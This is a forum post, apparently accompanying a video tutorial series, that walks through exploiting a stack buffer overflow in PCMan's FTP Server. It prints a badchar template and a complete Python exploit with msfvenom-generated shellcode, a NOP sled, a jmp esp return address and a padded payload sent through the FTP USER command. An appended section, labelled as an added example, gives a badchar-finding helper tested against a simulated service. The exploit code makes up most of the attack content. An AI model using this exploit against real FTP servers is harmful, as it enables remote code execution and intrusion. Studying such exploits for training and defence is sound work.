
Understanding Buffer Overflows - 3-4-5-6

Thread opened by tababa86 in the 'Video' forum on 4 March 2017

  1. tababa86 (Albay)
    [Video] Understanding Buffer Overflows - 3

    [Video] Understanding Buffer Overflows - 4-5

    [Video] Understanding Buffer Overflows - 6



    In this video tutorial I've shared the remaining 4 videos, on "jmp esp", "finding badchars" and "creating shellcode". If you search for the badchar template you'll find it on Google, but I'll share it here anyway. I'll also share my shellcode, but yours will be different: this one works for my computer, and you need to generate your own shellcode, which I also explained in the last video.

    Creating shellcode

    We'll do that with the msfvenom tool...

    Then we'll remove the badchars that stop our code from running, add the final version to our Python code, and try to get into the operating system....

    Code:
    badchar = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    +"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    +"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    +"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    +"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    +"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    +"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    +"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    +"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    +"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    +"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    +"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    +"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    +"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    +"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    +"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
    This is the badchar template... We didn't put \x00 at the start, since it's a badchar for most programs anyway...

    The exploit code...
    Code:
    # Simple fuzzer for PCMan's FTP Server
    # code for the buffer overflow... (Python 2: raw_input and print statement)
    import sys, socket, time   # import the modules....
    # fuzzer written in python...
    host = raw_input('ip adresi :') #   server ip
    port = int(21) # in the nmap scan it uses port 21...
    
    # badchars "\x00\x0a\x0d" (excluded when the shellcode was generated)
    buf =  ""
    buf += "\xda\xc4\xd9\x74\x24\xf4\xbf\xd9\xae\x1e\x8a\x5d\x2b"
    buf += "\xc9\xb1\x52\x31\x7d\x17\x03\x7d\x17\x83\x34\x52\xfc"
    buf += "\x7f\x3a\x43\x83\x80\xc2\x94\xe4\x09\x27\xa5\x24\x6d"
    buf += "\x2c\x96\x94\xe5\x60\x1b\x5e\xab\x90\xa8\x12\x64\x97"
    buf += "\x19\x98\x52\x96\x9a\xb1\xa7\xb9\x18\xc8\xfb\x19\x20"
    buf += "\x03\x0e\x58\x65\x7e\xe3\x08\x3e\xf4\x56\xbc\x4b\x40"
    buf += "\x6b\x37\x07\x44\xeb\xa4\xd0\x67\xda\x7b\x6a\x3e\xfc"
    buf += "\x7a\xbf\x4a\xb5\x64\xdc\x77\x0f\x1f\x16\x03\x8e\xc9"
    buf += "\x66\xec\x3d\x34\x47\x1f\x3f\x71\x60\xc0\x4a\x8b\x92"
    buf += "\x7d\x4d\x48\xe8\x59\xd8\x4a\x4a\x29\x7a\xb6\x6a\xfe"
    buf += "\x1d\x3d\x60\x4b\x69\x19\x65\x4a\xbe\x12\x91\xc7\x41"
    buf += "\xf4\x13\x93\x65\xd0\x78\x47\x07\x41\x25\x26\x38\x91"
    buf += "\x86\x97\x9c\xda\x2b\xc3\xac\x81\x23\x20\x9d\x39\xb4"
    buf += "\x2e\x96\x4a\x86\xf1\x0c\xc4\xaa\x7a\x8b\x13\xcc\x50"
    buf += "\x6b\x8b\x33\x5b\x8c\x82\xf7\x0f\xdc\xbc\xde\x2f\xb7"
    buf += "\x3c\xde\xe5\x18\x6c\x70\x56\xd9\xdc\x30\x06\xb1\x36"
    buf += "\xbf\x79\xa1\x39\x15\x12\x48\xc0\xfe\x17\x8d\xc8\xe8"
    buf += "\x4f\x8f\xcc\x05\xcc\x06\x2a\x4f\xfc\x4e\xe5\xf8\x65"
    buf += "\xcb\x7d\x98\x6a\xc1\xf8\x9a\xe1\xe6\xfd\x55\x02\x82"
    buf += "\xed\x02\xe2\xd9\x4f\x84\xfd\xf7\xe7\x4a\x6f\x9c\xf7"
    buf += "\x05\x8c\x0b\xa0\x42\x62\x42\x24\x7f\xdd\xfc\x5a\x82"
    buf += "\xbb\xc7\xde\x59\x78\xc9\xdf\x2c\xc4\xed\xcf\xe8\xc5"
    buf += "\xa9\xbb\xa4\x93\x67\x15\x03\x4a\xc6\xcf\xdd\x21\x80"
    buf += "\x87\x98\x09\x13\xd1\xa4\x47\xe5\x3d\x14\x3e\xb0\x42"
    buf += "\x99\xd6\x34\x3b\xc7\x46\xba\x96\x43\x76\xf1\xba\xe2"
    buf += "\x1f\x5c\x2f\xb7\x7d\x5f\x9a\xf4\x7b\xdc\x2e\x85\x7f"
    buf += "\xfc\x5b\x80\xc4\xba\xb0\xf8\x55\x2f\xb6\xaf\x56\x7a"
    
    nop="\x90"*20   # NOP sled in front of the shellcode
    
    ret="\x24\xF4\xB3\x7C"   # return address (jmp esp), overwrites EIP
    length = "A"*2006+ret+nop+buf   # 2006 bytes of padding up to EIP
    
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #  TCP socket
    client.connect((host, port)) # port, ip
    client.recv(1024) #  receive the FTP banner
    client.send("USER " +length) # A
    client.recv(1024) # receive reply
    client.send("gecen gecti") # sent once fully connected...
    client.recv(1024) # receive again
    client.close() # close the connection
    time.sleep(2) # keep it from sleeping against a DoS attack
    print "Length Sent: " + str(length) # the length sent from the client to the server
    
    #https://www.exploit-db.com/exploits/26471/
    This is the final version... So our 6-video tutorial is finished. I hope you find useful information in it.
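As an added example (not from the original post or tababa86's videos), here is the badchar workflow from the tutorial in Python 3: build the same 0x01..0xff probe the post lists, compare it with what is read back from memory in the debugger, and repeat until nothing is mangled. The service behaviour is a constructed stand-in (`_simulate_service`) that strips at a newline and rewrites a carriage return; that helper, `find_all_badchars` and the other names are my own, not the project's.

```python
from typing import Callable, Optional, Set

# Hypothetical helpers (added example). Bytes 0x01..0xff with \x00 left out,
# which is exactly the probe string the post pastes.
def badchar_template(exclude: Set[int] = frozenset({0x00})) -> bytes:
    """Build the probe: every byte value except those already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)

def first_badchar(sent: bytes, dumped: bytes) -> Optional[int]:
    """Compare the probe that was sent with the bytes read back from memory
    and return the first value that was altered or truncated (None if the whole
    probe survived). Everything after a mangled byte is unreliable, so only the
    first mismatch is trusted; the caller excludes it and probes again."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None

def badchars_in(shellcode: bytes, bad: Set[int]) -> Set[int]:
    """Sanity check for generated shellcode: which forbidden bytes does it contain?"""
    return {b for b in shellcode if b in bad}

def _simulate_service(data: bytes) -> bytes:
    """Constructed stand-in for 'read the buffer back in the debugger': this toy
    service truncates at the first \\x0a and turns \\x0d into \\x00, the same
    three bad bytes (\\x00 \\x0a \\x0d) the post's exploit comment names."""
    data = data.split(b"\x0a", 1)[0]
    return data.replace(b"\x0d", b"\x00")

def find_all_badchars(read_back: Callable[[bytes], bytes] = _simulate_service,
                      start: Set[int] = frozenset({0x00})) -> Set[int]:
    """Iterate the probe/compare cycle until the probe comes back intact."""
    bad = set(start)
    while True:
        probe = badchar_template(bad)
        mangled = first_badchar(probe, read_back(probe))
        if mangled is None:
            return bad
        bad.add(mangled)

if __name__ == "__main__":
    bad = find_all_badchars()
    print("bad chars:", " ".join("\\x%02x" % b for b in sorted(bad)))
    print("forbidden bytes in sample:", badchars_in(b"\x90\x90\x0a\x41", bad))
```

Against a real target you would replace `_simulate_service` with the bytes copied out of the debugger after each send; the loop stays the same.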
